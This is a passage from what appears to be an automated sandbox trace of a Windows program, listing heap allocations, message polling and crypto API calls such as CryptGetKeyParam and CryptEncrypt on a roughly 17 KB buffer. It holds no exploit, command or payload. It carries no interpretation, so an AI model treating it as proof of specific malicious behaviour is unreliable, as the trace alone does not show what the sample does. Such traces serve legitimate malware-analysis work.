hHeap=0x8a0000) returned 1 [0198.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0198.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0198.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0198.691] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0198.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0198.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0198.691] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0198.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0198.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0198.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0198.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0198.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0198.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0198.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0198.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0198.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0198.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0198.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0198.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0198.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0198.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0198.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0198.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0198.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0198.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0198.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0198.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0198.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0198.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0198.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0198.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0198.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0198.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0198.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0198.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0198.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0198.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0198.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0198.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0198.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0198.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0198.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0198.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0198.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0198.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0198.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0198.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0198.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0198.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0198.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0198.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0198.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0198.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0198.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0198.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0198.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0198.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0198.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0198.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0198.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0198.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0198.695] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0198.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0198.696] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c27a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0198.696] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.696] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.696] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.696] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.696] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.706] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.706] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.707] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.707] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0198.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0198.707] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.707] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0198.707] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0198.707] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.707] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.707] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0198.707] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.707] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0198.707] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.707] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.707] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.707] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0198.708] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.708] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0198.708] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.708] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.708] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x425e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x4260) returned 1 [0198.708] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.708] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0198.708] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.708] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.708] CharLowerBuffW (in: lpsz="byte[16993]", cchLength=0xb | out: lpsz="byte[16993]") returned 0xb [0198.708] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.709] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.709] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.709] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.709] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.709] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbf24e8*, pdwDataLen=0x87e820*=0x425e, dwBufLen=0x4260 | out: pbData=0xbf24e8*, pdwDataLen=0x87e820*=0x4260) returned 1 [0198.709] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.709] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0198.709] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.709] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.709] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.709] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.709] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0198.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.709] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.710] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.710] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.710] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0198.710] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.710] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.710] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0198.710] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.710] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0198.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.710] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.710] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.710] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.712] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.712] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.712] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0198.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.712] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 